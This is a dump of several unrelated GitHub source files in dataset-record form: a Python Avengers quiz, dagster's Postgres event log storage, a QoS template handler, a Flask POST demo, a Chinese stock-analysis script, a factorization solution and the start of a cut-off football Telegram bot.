print(\"\"\"⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣤⣾⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⣠⣴⣿⡿⠟⠛⠋⣽⣿⣿⣿⣿⣿⣿⣦⣄⠀⠀⠀⠀\n⠀⠀⢀⣾⣿⠟⠁⠀⠀⠀⣼⣿⣿⠏⢸⣿⣿⡏⠻⣿⣷⡀⠀⠀\n⠀⢠⣿⡟⠁⠀⠀⠀⠀⣼⣿⣿⡟⠀⢸⣿⣿⡇⠀⠈⢻⣿⡄⠀\n⢠⣿⡟⠀⠀⠀⠀⠀⣼⣿⣿⡿⠀⠀⢸⣿⣿⡇⠀⠀⠀⢻⣿⡄\n⣸⣿⠇⠀⠀⠀⠀⣼⣿⣿⣿⠁⠀⠀⠘⢿⣿⡇⠀⠀⠀⠘⣿⣇\n⢿⣿⠀⠀⠀⠀⣰⣿⣿⣿⣇⣀⣀⣀⣼⣦⡙⠇⠀⠀⠀⠀⣿⡿\n⢸⣿⡇⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡦⠀⠀⠀⢸⣿⡇\n⠀⢿⣿⡀⣸⣿⣿⣿⠟⠉⠉⠉⠉⠉⣿⠟⣡⡆⠀⠀⢀⣿⡿⠀\n⠀⠈⠛⣰⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠠⠾⠿⠇⠀⣠⣿⡿⠁⠀\n⠀⠀⣰⣿⣿⣿⡟⣀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣾⡿⠋⠀⠀⠀\n⠀⣰⣿⣿⣿⡿⠰⠿⣿⣶⣶⣶⣶⣶⣶⣿⠿⠟⠉⠀⠀⠀⠀⠀\n⠀⠉⠉⠉⠉⠁⠀⠀⠀⠈⠉⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n\"\"\")\n\n print(\"Welcome to the Avengers quiz!\\n\")\n sleep(2)\n print(\"Test your knowledge of the Marvel Avengers movie series.\\n\")\n print(\"There are ten questions in total.\\n\")\n print(\"All questions are multiple-choice.\\n\")\n print(\"The choices are a, b, c, and d for all ten questions.\\n\")\n sleep(2)\n\n\ndef begin_quiz():\n \"\"\"\n Get user name and prompt the user if they wish to play the quiz.\n \"\"\"\n\n global user_name\n\n while True:\n print(\"Please enter your user name and hit the enter key:\")\n\n user_name = input().strip()\n\n if validate_user_name(user_name):\n break\n\n play_quiz = \"\"\n\n while play_quiz not in [\"y\", \"n\"]:\n play_quiz = input((\"Do you want to begin the quiz? (y/n) \\n\")).lower()\n\n if play_quiz == \"n\":\n print(f\"Thank you {user_name}, please try the quiz another time!\")\n\n sys.exit()\n\n if play_quiz not in [\"y\", \"n\"]:\n print(\"Invalid Input! Please enter yes (y) or no (n)\\n\",)\n\n clear_terminal()\n\n\ndef run_quiz():\n \"\"\"\n Loop through quiz_data and print questions and options.\n Request the correct answer and verify whether the answer\n is correct or incorrect.\n \"\"\"\n\n for index, quiz in enumerate(quiz_data, start=1):\n answer = \"\"\n display_question(index, quiz[\"question\"], quiz[\"options\"])\n\n while answer not in [\"a\", \"b\", \"c\", \"d\"]:\n answer = input(\"\\n\").lower()\n\n if answer not in [\"a\", \"b\", \"c\", \"d\"]:\n print(\"Invalid Input! Please enter a, b, c, or d\")\n\n check_answer(answer, quiz[\"answer\"])\n\n clear_terminal()\n\n display_result()\n\n\ndef update_leaderboard(data):\n \"\"\"\n Add user-name and score to Google Sheets\n \"\"\"\n\n print(\"Exporting your results to database....\\n\")\n\n update_workout = SHEET.worksheet(\"leaderboard\")\n update_workout.append_row(data)\n\n print(\"Results exported successfully!!\\n\")\n\n\ndef display_leaderboard():\n \"\"\"\n Get all values from the leaderboard worksheet.\n Sort the values array to get top scores first on the list.\n Print out username and score of the top 5 highest vales\n \"\"\"\n\n data = SHEET.worksheet(\"leaderboard\")\n\n values = data.get_all_values()\n\n values.sort(key=sort_by_score, reverse=True)\n\n print(\"Top 5 users\\n\")\n print(\"Username\\t Score\\n\")\n\n for index in range(0, 5):\n print(f\"{values[index][0]}\\t\\t {values[index][1]}\\n\")\n\n\ndef display_result():\n \"\"\"\n Print the score and ask the user if they are interested in replaying.\n Calls update_leaderboard function to add user name and score Google Sheets\n If the user chooses to play again, the replay_quiz function will be called.\n If the user decides not to play again, the application will quit.\n \"\"\"\n\n global score\n\n print(f\"Congratulations {user_name}, on completing the quiz!\\n\")\n\n play_again = \"\"\n\n print(f\"You scored {score}/10\\n\")\n\n data = [user_name, score]\n\n update_leaderboard(data)\n\n sleep(2)\n\n display_leaderboard()\n\n while play_again not in [\"y\", \"n\"]:\n play_again = input(\"Would you like to replay the quiz? (y/n)\\n\")\n\n if play_again not in [\"y\", \"n\"]:\n print(\"Invalid Input! Please enter yes (y) or no (n)\\n\")\n\n if play_again.lower() == \"y\":\n print(\"Restarting quiz....\\n\")\n score = 0\n replay_quiz()\n elif play_again.lower() == \"n\":\n print(f\"Thank you {user_name}, for taking the quiz!\\n\")\n print(\"Quitting application.....\")\n quit()\n\n\ndef replay_quiz():\n \"\"\"\n Prints restarting messages and calls run_quiz function.\n \"\"\"\n\n print(\"Restarting the quiz\\n\")\n print(f\"Best of luck {user_name}\\n\")\n\n clear_terminal()\n\n run_quiz()\n\n\ndef main():\n \"\"\"Call program main functions\"\"\"\n\n quiz_information()\n\n begin_quiz()\n\n run_quiz()\n\n\nmain()\n","repo_name":"EdwardShanahan07/avengers-quiz","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9894265127","text":"from typing import Any, ContextManager, Mapping, Optional, Sequence\n\nimport dagster._check as check\nimport sqlalchemy as db\nimport sqlalchemy.dialects as db_dialects\nimport sqlalchemy.pool as db_pool\nfrom dagster._config.config_schema import UserConfigSchema\nfrom dagster._core.errors import DagsterInvariantViolationError\nfrom dagster._core.event_api import EventHandlerFn\nfrom dagster._core.events import ASSET_CHECK_EVENTS, ASSET_EVENTS\nfrom dagster._core.events.log import EventLogEntry\nfrom dagster._core.storage.config import pg_config\nfrom dagster._core.storage.event_log import (\n AssetKeyTable,\n DynamicPartitionsTable,\n SqlEventLogStorage,\n SqlEventLogStorageMetadata,\n SqlEventLogStorageTable,\n)\nfrom dagster._core.storage.event_log.base import EventLogCursor\nfrom dagster._core.storage.event_log.migration import ASSET_KEY_INDEX_COLS\nfrom dagster._core.storage.event_log.polling_event_watcher import SqlPollingEventWatcher\nfrom dagster._core.storage.sql import (\n AlembicVersion,\n check_alembic_revision,\n create_engine,\n run_alembic_upgrade,\n stamp_alembic_rev,\n)\nfrom dagster._core.storage.sqlalchemy_compat import db_select\nfrom dagster._serdes import ConfigurableClass, ConfigurableClassData, deserialize_value\nfrom sqlalchemy.engine import Connection\n\nfrom ..utils import (\n create_pg_connection,\n pg_alembic_config,\n pg_statement_timeout,\n pg_url_from_config,\n retry_pg_connection_fn,\n retry_pg_creation_fn,\n)\n\nCHANNEL_NAME = \"run_events\"\n\n\nclass PostgresEventLogStorage(SqlEventLogStorage, ConfigurableClass):\n \"\"\"Postgres-backed event log storage.\n\n Users should not directly instantiate this class; it is instantiated by internal machinery when\n ``dagster-webserver`` and ``dagster-graphql`` load, based on the values in the ``dagster.yaml`` file in\n ``$DAGSTER_HOME``. Configuration of this class should be done by setting values in that file.\n\n To use Postgres for all of the components of your instance storage, you can add the following\n block to your ``dagster.yaml``:\n\n .. literalinclude:: ../../../../../../examples/docs_snippets/docs_snippets/deploying/dagster-pg.yaml\n :caption: dagster.yaml\n :lines: 1-8\n :language: YAML\n\n If you are configuring the different storage components separately and are specifically\n configuring your event log storage to use Postgres, you can add a block such as the following\n to your ``dagster.yaml``:\n\n .. literalinclude:: ../../../../../../examples/docs_snippets/docs_snippets/deploying/dagster-pg-legacy.yaml\n :caption: dagster.yaml\n :lines: 12-21\n :language: YAML\n\n Note that the fields in this config are :py:class:`~dagster.StringSource` and\n :py:class:`~dagster.IntSource` and can be configured from environment variables.\n\n \"\"\"\n\n def __init__(\n self,\n postgres_url: str,\n should_autocreate_tables: bool = True,\n inst_data: Optional[ConfigurableClassData] = None,\n ):\n self._inst_data = check.opt_inst_param(inst_data, \"inst_data\", ConfigurableClassData)\n self.postgres_url = check.str_param(postgres_url, \"postgres_url\")\n self.should_autocreate_tables = check.bool_param(\n should_autocreate_tables, \"should_autocreate_tables\"\n )\n\n self._disposed = False\n\n # Default to not holding any connections open to prevent accumulating connections per DagsterInstance\n self._engine = create_engine(\n self.postgres_url, isolation_level=\"AUTOCOMMIT\", poolclass=db_pool.NullPool\n )\n\n self._event_watcher = SqlPollingEventWatcher(self)\n\n self._secondary_index_cache = {}\n\n # Stamp and create tables if the main table does not exist (we can't check alembic\n # revision because alembic config may be shared with other storage classes)\n if self.should_autocreate_tables:\n table_names = retry_pg_connection_fn(lambda: db.inspect(self._engine).get_table_names())\n if \"event_logs\" not in table_names:\n retry_pg_creation_fn(self._init_db)\n self.reindex_events()\n self.reindex_assets()\n\n super().__init__()\n\n def _init_db(self) -> None:\n with self._connect() as conn:\n with conn.begin():\n SqlEventLogStorageMetadata.create_all(conn)\n stamp_alembic_rev(pg_alembic_config(__file__), conn)\n\n def optimize_for_webserver(self, statement_timeout: int, pool_recycle: int) -> None:\n # When running in dagster-webserver, hold an open connection and set statement_timeout\n existing_options = self._engine.url.query.get(\"options\")\n timeout_option = pg_statement_timeout(statement_timeout)\n if existing_options:\n options = f\"{timeout_option} {existing_options}\"\n else:\n options = timeout_option\n self._engine = create_engine(\n self.postgres_url,\n isolation_level=\"AUTOCOMMIT\",\n pool_size=1,\n connect_args={\"options\": options},\n pool_recycle=pool_recycle,\n )\n\n def upgrade(self) -> None:\n alembic_config = pg_alembic_config(__file__)\n with self._connect() as conn:\n run_alembic_upgrade(alembic_config, conn)\n\n @property\n def inst_data(self) -> Optional[ConfigurableClassData]:\n return self._inst_data\n\n @classmethod\n def config_type(cls) -> UserConfigSchema:\n return pg_config()\n\n @classmethod\n def from_config_value(\n cls, inst_data: Optional[ConfigurableClassData], config_value: Mapping[str, Any]\n ) -> \"PostgresEventLogStorage\":\n return PostgresEventLogStorage(\n inst_data=inst_data,\n postgres_url=pg_url_from_config(config_value),\n should_autocreate_tables=config_value.get(\"should_autocreate_tables\", True),\n )\n\n @staticmethod\n def create_clean_storage(\n conn_string: str, should_autocreate_tables: bool = True\n ) -> \"PostgresEventLogStorage\":\n engine = create_engine(\n conn_string, isolation_level=\"AUTOCOMMIT\", poolclass=db_pool.NullPool\n )\n try:\n SqlEventLogStorageMetadata.drop_all(engine)\n finally:\n engine.dispose()\n\n return PostgresEventLogStorage(conn_string, should_autocreate_tables)\n\n def store_event(self, event: EventLogEntry) -> None:\n \"\"\"Store an event corresponding to a run.\n\n Args:\n event (EventLogEntry): The event to store.\n \"\"\"\n check.inst_param(event, \"event\", EventLogEntry)\n insert_event_statement = self.prepare_insert_event(event) # from SqlEventLogStorage.py\n with self._connect() as conn:\n result = conn.execute(\n insert_event_statement.returning(\n SqlEventLogStorageTable.c.run_id, SqlEventLogStorageTable.c.id\n )\n )\n res = result.fetchone()\n result.close()\n\n # LISTEN/NOTIFY no longer used for pg event watch - preserved here to support version skew\n conn.execute(\n db.text(f\"\"\"NOTIFY {CHANNEL_NAME}, :notify_id; \"\"\"),\n {\"notify_id\": res[0] + \"_\" + str(res[1])}, # type: ignore\n )\n event_id = int(res[1]) # type: ignore\n\n if (\n event.is_dagster_event\n and event.dagster_event_type in ASSET_EVENTS\n and event.dagster_event.asset_key # type: ignore\n ):\n self.store_asset_event(event, event_id)\n\n if event_id is None:\n raise DagsterInvariantViolationError(\n \"Cannot store asset event tags for null event id.\"\n )\n\n self.store_asset_event_tags(event, event_id)\n\n if event.is_dagster_event and event.dagster_event_type in ASSET_CHECK_EVENTS:\n self.store_asset_check_event(event, event_id)\n\n def store_asset_event(self, event: EventLogEntry, event_id: int) -> None:\n check.inst_param(event, \"event\", EventLogEntry)\n if not (event.dagster_event and event.dagster_event.asset_key):\n return\n\n # We switched to storing the entire event record of the last materialization instead of just\n # the AssetMaterialization object, so that we have access to metadata like timestamp,\n # job, run_id, etc.\n #\n # This should make certain asset queries way more performant, without having to do extra\n # queries against the event log.\n #\n # This should be accompanied by a schema change in 0.12.0, renaming `last_materialization`\n # to `last_materialization_event`, for clarity. For now, we should do some back-compat.\n #\n # https://github.com/dagster-io/dagster/issues/3945\n\n # The AssetKeyTable contains a `last_materialization_timestamp` column that is exclusively\n # used to determine if an asset exists (last materialization timestamp > wipe timestamp).\n # This column is used nowhere else, and as of AssetObservation/AssetMaterializationPlanned\n # event creation, we want to extend this functionality to ensure that assets with any event\n # (observation, materialization, or materialization planned) yielded with timestamp\n # > wipe timestamp display in the Dagster UI.\n\n # As of the following PRs, we update last_materialization_timestamp to store the timestamp\n # of the latest asset observation, materialization, or materialization_planned that has occurred.\n # https://github.com/dagster-io/dagster/pull/6885\n # https://github.com/dagster-io/dagster/pull/7319\n\n # The AssetKeyTable also contains a `last_run_id` column that is updated upon asset\n # materialization. This column was not being used until the below PR. This new change\n # writes to the column upon `ASSET_MATERIALIZATION_PLANNED` events to fetch the last\n # run id for a set of assets in one roundtrip call to event log storage.\n # https://github.com/dagster-io/dagster/pull/7319\n\n values = self._get_asset_entry_values(\n event, event_id, self.has_secondary_index(ASSET_KEY_INDEX_COLS)\n )\n with self.index_connection() as conn:\n query = db_dialects.postgresql.insert(AssetKeyTable).values(\n asset_key=event.dagster_event.asset_key.to_string(),\n **values,\n )\n if values:\n query = query.on_conflict_do_update(\n index_elements=[AssetKeyTable.c.asset_key],\n set_=dict(**values),\n )\n else:\n query = query.on_conflict_do_nothing()\n conn.execute(query)\n\n def add_dynamic_partitions(\n self, partitions_def_name: str, partition_keys: Sequence[str]\n ) -> None:\n if not partition_keys:\n return\n\n # Overload base implementation to push upsert logic down into the db layer\n self._check_partitions_table()\n with self.index_connection() as conn:\n conn.execute(\n db_dialects.postgresql.insert(DynamicPartitionsTable)\n .values(\n [\n dict(partitions_def_name=partitions_def_name, partition=partition_key)\n for partition_key in partition_keys\n ]\n )\n .on_conflict_do_nothing(),\n )\n\n def _connect(self) -> ContextManager[Connection]:\n return create_pg_connection(self._engine)\n\n def run_connection(self, run_id: Optional[str] = None) -> ContextManager[Connection]:\n return self._connect()\n\n def index_connection(self) -> ContextManager[Connection]:\n return self._connect()\n\n def has_table(self, table_name: str) -> bool:\n return bool(self._engine.dialect.has_table(self._engine.connect(), table_name))\n\n def has_secondary_index(self, name: str) -> bool:\n if name not in self._secondary_index_cache:\n self._secondary_index_cache[name] = super(\n PostgresEventLogStorage, self\n ).has_secondary_index(name)\n return self._secondary_index_cache[name]\n\n def enable_secondary_index(self, name: str) -> None:\n super(PostgresEventLogStorage, self).enable_secondary_index(name)\n if name in self._secondary_index_cache:\n del self._secondary_index_cache[name]\n\n def watch(\n self,\n run_id: str,\n cursor: Optional[str],\n callback: EventHandlerFn,\n ) -> None:\n if cursor and EventLogCursor.parse(cursor).is_offset_cursor():\n check.failed(\"Cannot call `watch` with an offset cursor\")\n\n self._event_watcher.watch_run(run_id, cursor, callback)\n\n def _gen_event_log_entry_from_cursor(self, cursor) -> EventLogEntry:\n with self._engine.connect() as conn:\n cursor_res = conn.execute(\n db_select([SqlEventLogStorageTable.c.event]).where(\n SqlEventLogStorageTable.c.id == cursor\n ),\n )\n return deserialize_value(cursor_res.scalar(), EventLogEntry) # type: ignore\n\n def end_watch(self, run_id: str, handler: EventHandlerFn) -> None:\n self._event_watcher.unwatch_run(run_id, handler)\n\n def __del__(self) -> None:\n # Keep the inherent limitations of __del__ in Python in mind!\n self.dispose()\n\n def dispose(self) -> None:\n if not self._disposed:\n self._disposed = True\n self._event_watcher.close()\n\n def alembic_version(self) -> AlembicVersion:\n alembic_config = pg_alembic_config(__file__)\n with self._connect() as conn:\n return check_alembic_revision(alembic_config, conn)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-postgres/dagster_postgres/event_log/event_log.py","file_name":"event_log.py","file_ext":"py","file_size_in_byte":13839,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"42728512725","text":"# -*- coding: utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\nimport uuid\nfrom pdsframe import *\nfrom service_mds import g\nfrom service_mds import common\nfrom service_mds import pb2dict_proxy\nimport message.pds_pb2 as msg_pds\nimport message.mds_pb2 as msg_mds\n\nclass QosTemplateAddMachine(BaseMachine):\n __metaclass__ = MataMachine\n\n MID = msg_mds.QOS_TEMPLATE_ADD_REQUEST\n\n def INIT(self, request):\n self.response = MakeResponse(msg_mds.QOS_TEMPLATE_ADD_RESPONSE, request)\n self.request = request\n self.request_body = request.body.Extensions[msg_mds.qos_template_add_request]\n\n if g.is_ready == False:\n self.response.rc.retcode = msg_mds.RC_MDS_SERVICE_IS_NOT_READY\n self.response.rc.message = \"MDS service is not ready\"\n self.SendResponse(self.response)\n return MS_FINISH\n\n self.template_name = self.request_body.template_name\n self.template_info = common.GetQosTemplateInfoByName(self.template_name)\n if self.template_info:\n self.response.rc.retcode = msg_mds.RC_MDS_QOS_TEMPLATE_ALREADY_ADDED\n self.response.rc.message = \"QoS '%s' is already added\" % self.template_name\n self.SendResponse(self.response)\n return MS_FINISH\n\n template_info = msg_pds.QosTemplateInfo()\n template_info.template_name = self.template_name\n template_info.template_id = str(uuid.uuid1())\n template_info.qos_info.read_bps = self.request_body.qos_info.read_bps\n template_info.qos_info.read_iops = self.request_body.qos_info.read_iops\n template_info.qos_info.write_bps = self.request_body.qos_info.write_bps\n template_info.qos_info.write_iops = self.request_body.qos_info.write_iops\n # 将QoS模板信息持久化\n data = pb2dict_proxy.pb2dict(\"template_info\", template_info)\n e, _ = dbservice.srv.create(\"/qostemplate/%s\" % template_info.template_id, data)\n if e:\n logger.run.error(\"Add template faild %s:%s\" % (e, _))\n self.response.rc.retcode = msg_mds.RC_MDS_CREATE_DB_DATA_FAILED\n self.response.rc.message = \"Keep data failed\"\n self.SendResponse(self.response)\n return MS_FINISH\n\n # 更新QoS模板列表\n g.qos_template_list.qos_template_infos.add().CopyFrom(template_info)\n\n self.response.rc.retcode = msg_pds.RC_SUCCESS\n self.SendResponse(self.response)\n return MS_FINISH\n","repo_name":"saxisuer/smartmgr-v2","sub_path":"service_mds/qos_template_add.py","file_name":"qos_template_add.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19461416948","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template(\"$.post().html\")\n\n\n@app.route('/post_text', methods=['POST'])\ndef post_text():\n # 获取数据\n name = request.values[\"name\"]\n email = request.values[\"email\"]\n # 返回字符串\n result = \"用户姓名为\" + name + \",用户邮箱为\" + email\n return result\n\n\n@app.route('/post_json', methods=['POST'])\ndef post_json():\n name = request.values[\"name\"]\n email = request.values[\"email\"]\n # 返回json格式数据\n result = {\"name\": name, \"email\": email}\n return result\n\n\nif __name__ == '__main__':\n app.run(port=5002, debug=True)\n","repo_name":"LenkyAndrews/JQuery-Learning","sub_path":"JQueryAJAX/$.post().py","file_name":"$.post().py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30940997332","text":"'''\n@author:rocky\n@email:weigesysu@qq.com\n@feature: 收盘事后分析\n'''\n\nfrom configure.settings import DBSelector\nimport pandas as pd\nfrom scipy import stats\nimport tushare as ts\nimport datetime\nimport os\n# import matplotlib.pyplot as plt\nimport numpy as np\n\npd.set_option('display.max_rows', None)\n\n\ndef volume_calculation(code, start, end):\n '''\n 计算某个股票的某个时间段的累计成交量\n\n :param start: 开始日期\n :param end: 结束日期\n :return: 成交量,占每天比例\n '''\n\n df = ts.get_today_ticks(code)\n\n # 转换str为时间格式,便于下面用来比较时间的大小\n df['time'] = df['time'].map(lambda x: datetime.datetime.strptime(str(x), '%H:%M:%S'))\n total = df['volume'].sum()\n start = datetime.datetime.strptime(start, '%H:%M:%S')\n end = datetime.datetime.strptime(end, '%H:%M:%S')\n new_df = df[(df['time'] >= start) & (df['time'] < end)]\n\n volume = new_df['volume'].sum()\n rate = round(volume * 1.00 / total * 100, 2)\n\n return volume, rate\n\n\ndef today_statistics(today):\n '''\n :help: 今天涨跌幅的统计分析: 中位数,均值等数据\n :param today: 日期 2019-01-01\n :return:None\n '''\n\n engine = DBSelector().get_engine('db_daily')\n df = pd.read_sql(today, engine, index_col='index')\n # 去除停牌的 成交量=0\n\n df = df[df['volume'] != 0]\n median = round(df['changepercent'].median(), 2)\n mean = round(df['changepercent'].mean(), 2)\n std = round(df['changepercent'].std(), 2)\n p_25 = round(stats.scoreatpercentile(df['changepercent'], 25), 2)\n p_50 = round(stats.scoreatpercentile(df['changepercent'], 50), 2)\n p_75 = round(stats.scoreatpercentile(df['changepercent'], 75), 2)\n\n print('中位数: {}'.format(median))\n print('平均数: {}'.format(mean))\n print('方差: {}'.format(std))\n print('25%: {}'.format(p_25))\n print('50%: {}'.format(p_50))\n print('75%: {}'.format(p_75))\n\n\ndef zt_location(date):\n '''\n :help: 分析涨停的区域分布\n :param date:日期格式 20180404\n :return:\n '''\n engine_zdt = DBSelector().get_engine('db_zdt')\n engine_basic = DBSelector().get_engine('db_stock')\n\n df = pd.read_sql(date + 'zdt', engine_zdt, index_col='index')\n df_basic = pd.read_sql('tb_basic_info', engine_basic, index_col='index')\n result = {}\n\n for code in df['代码'].values:\n try:\n area = df_basic[df_basic['code'] == code]['area'].values[0]\n result.setdefault(area, 0)\n result[area] += 1\n\n except Exception as e:\n print(e)\n\n new_result = sorted(result.items(), key=lambda x: x[1], reverse=True)\n for k, v in new_result:\n print(k, v)\n\n\ndef show_percentage(price):\n '''\n :help: 根据收盘价计算每个百分比的价格\n :param open_price: 开盘价\n :return:\n '''\n\n for i in range(1, 11):\n print('{}\\t+{}% -> {}'.format(price, i, round(price * (1 + 0.01 * i), 2)))\n\n for i in range(1, 11):\n print('{}\\t-{}% -> {}'.format(price, i, round(price * (1 - 0.01 * i), 2)))\n\n\ndef stock_profit(code, start, end):\n '''\n :help: 计算某个时间段的收益率\n :param code: 股票代码\n :param start: 开始时间\n :param end: 结束时间\n :return: 收益率\n '''\n\n k_data = ts.get_k_data(start=start, end=end, code=code)\n\n if len(k_data)==0:\n return np.nan\n\n start_price = k_data['close'].values[0]\n print(\"Start price: \", start_price)\n\n end_price = k_data['close'].values[-1]\n\n print(\"End price: \", end_price)\n\n earn_profit = (end_price - start_price) / start_price * 100\n print(\"Profit: \", round(earn_profit, 2))\n return round(earn_profit, 2)\n\n\ndef exclude_kcb(df):\n '''\n :help: 去除科创板\n :param df:\n :return:\n '''\n non_kcb = df[~df['code'].map(lambda x: True if x.startswith('688') else False)]\n return non_kcb\n\n\ndef plot_percent_distribution(date):\n '''\n :help:图形显示某一天的涨跌幅分布\n :param date:\n :return:\n '''\n import matplotlib.pyplot as plt\n\n total = []\n engine = DBSelector().get_engine('db_daily')\n df = pd.read_sql(date, con=engine)\n df = exclude_kcb(df)\n\n count = len(df[(df['changepercent'] >= -11) & (df['changepercent'] <= -9.5)])\n total.append(count)\n\n for i in range(-9, 9, 1):\n count = len(df[(df['changepercent'] >= i * 1.00) & (df['changepercent'] < ((i + 1)) * 1.00)])\n total.append(count)\n\n count = len(df[(df['changepercent'] >= 9)])\n total.append(count)\n # print(total)\n df_figure = pd.Series(total)\n plt.figure(figsize=(16, 10))\n X = range(-10, 10)\n plt.bar(X, height=total, color='y')\n for x, y in zip(X, total):\n plt.text(x, y + 0.05, y, ha='center', va='bottom')\n plt.grid()\n plt.xticks(range(-10, 11))\n plt.show()\n\n\ndef year_price_change(year,ignore_new_stock=False):\n '''\n :year: 年份\n :ignore_new_stock: 排除当年上市的新股\n 计算某年个股的涨幅排名\n :return: None 生成excel\n '''\n\n year = int(year)\n\n basic = ts.get_stock_basics()\n pro = []\n\n name=''\n # basic['timeToMarket']=pd.to_datetime(basic['timeToMarket'],format='%Y%m%d')\n\n # 去除当年的新股\n if ignore_new_stock:\n basic=basic[basic['timeToMarket']< int('{}0101'.format(year))]\n name = '_ignore_new_stock'\n\n filename='{}_all_price_change{}.xls'.format(year,name)\n\n for code in basic.index.values:\n p = stock_profit(code, '{}-01-01'.format(year), '{}-01-01'.format(year+1))\n pro.append(p)\n\n basic['p_change_year'] = pro\n basic=basic.sort_values(by='p_change_year', ascending=False)\n basic.to_excel(filename, encoding='gbk')\n\n\ndef stock_analysis(filename):\n '''\n # 分析年度的数据\n :return:\n '''\n\n df=pd.read_excel(filename,encoding='gbk')\n print('mean:\\n',df['p_change_year'].mean())\n print('max:\\n',df['p_change_year'].max())\n print('min:\\n',df['p_change_year'].min())\n print('middle\\n',df['p_change_year'].median())\n # plt.figure()\n # df['p_change_year'].plot.hist()\n # plt.show()\n\n\ndef cb_stock_year():\n '''\n 上一年可转债正股的涨跌幅排名\n :return:\n '''\n engine = get_engine('db_stock')\n df_cb = pd.read_sql('tb_bond_jisilu', engine)\n filename='2019_all_price_change_ignore_new_stock.xls'\n df_all=pd.read_excel(filename,encoding='gbk')\n zg_codes = list(df_cb['正股代码'].values)\n df = df_all[df_all['code'].isin(zg_codes)]\n df.to_excel('2019_cb_zg.xls',encoding='gbk')\n\ndef main():\n ## 某个股票某个时间段的成交量 ####\n # code = '000069'\n # v, ratio = volume_calculation(code,'09:30:00', '10:00:00')\n # print('\\n')\n # print(v, ratio)\n\n ## 涨跌幅分布 #####\n # TODAY=datetime.datetime.now().strftime(\"%Y-%m-%d\")\n # today_tendency(TODAY)\n\n ## 分析涨停的区域分布 ####\n # TODAY = datetime.datetime.now().strftime(\"%Y%m%d\")\n # zt_location(TODAY)\n\n ## 显示百分比价格\n # show_percentage(121)\n\n ## 计算某个个股某段时间的收益率\n # stock_profit('300333','2019-01-01','2020-02-03')\n\n ## 显示价格分布\n # date = '2020-02-07'\n # plot_percent_distribution(date)\n\n # 某年个股涨幅\n # year_price_change(2019,True)\n # stock_analysis('2019_all_price_change_ignore_new_stock.xls')\n\n cb_stock_year()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Rockyzsu/stock","sub_path":"StockAnalyze.py","file_name":"StockAnalyze.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","stars":4515,"dataset":"github-code","pt":"53"} +{"seq_id":"31637610488","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\na,b = map(int,input().split())\nmod = 10**9+7\n\ndef factorization(n):\n arr = []\n temp = n\n for i in range(2, int(n**0.5//1)+1 ):\n if(temp%i == 0):\n count=0\n while( temp%i == 0):\n count += 1\n temp = temp // i\n arr.append([i, count])\n if temp==1:\n break\n\n if(temp != 1):\n arr.append([temp, 1])\n \n return arr\n\nfac = dict()\nfor i in range(b+1,a+1):\n arr = factorization(i)\n for p,num in arr:\n if p in fac:\n fac[p] += num\n else:\n fac[p] = num\n\nans = 1\nfor i in fac.values():\n ans *= (i+1)\n ans %= mod\nprint(ans)","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc034/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2619663263","text":"import http.client\nimport json\nfrom telegram.ext import Updater, CommandHandler\nimport telegram\nimport datetime\nimport dateutil.parser\nfrom football_tg_bot_const import *\n\n# Italian Serie A is always the default league for all commands\n\nheaders = {\"X-Auth-Token\": api_token, \"X-Response-Control\": \"minified\"}\n\n\n# parse date TZ -> UTC, add UTC offset, print string\ndef parse_date(date, time_zone, status):\n if status != \"FINISHED\":\n return (dateutil.parser.parse(date) + datetime.timedelta(hours=time_zone)).strftime(\"%a, %b %d %Y %H:%M\")\n else:\n return (dateutil.parser.parse(date)).strftime(\"%a, %b %d %Y\")\n\n\ndef parse_date_no_day(date, time_zone):\n return (dateutil.parser.parse(date) + datetime.timedelta(hours=time_zone)).strftime(\"%b %d %Y\")\n\n\n# posts error message to chat\ndef error(bot):\n bot.send_message(chat_id=update.message.chat_id,\n text=\"``` There was something wrong, try again later... ```\", parse_mode=\"markdown\")\n return\n\n\n# tries connection to API\ndef get_connection(bot):\n try:\n connection = http.client.HTTPConnection(\"api.football-data.org\")\n except Exception as e:\n error(bot)\n connection = None\n return connection\n\n\n# gets table from API\ndef get_table(connection, league_id):\n try:\n connection.request(\"GET\", \"/v1/competitions/{}/leagueTable\".format(league_id), None, headers)\n except:\n error(bot)\n return\n return json.loads(connection.getresponse().read().decode())\n\n\n# Champions League table is divided in groups, needs its own parsing\ndef CL_table(response):\n league_id = 464\n ranks = []\n for group in 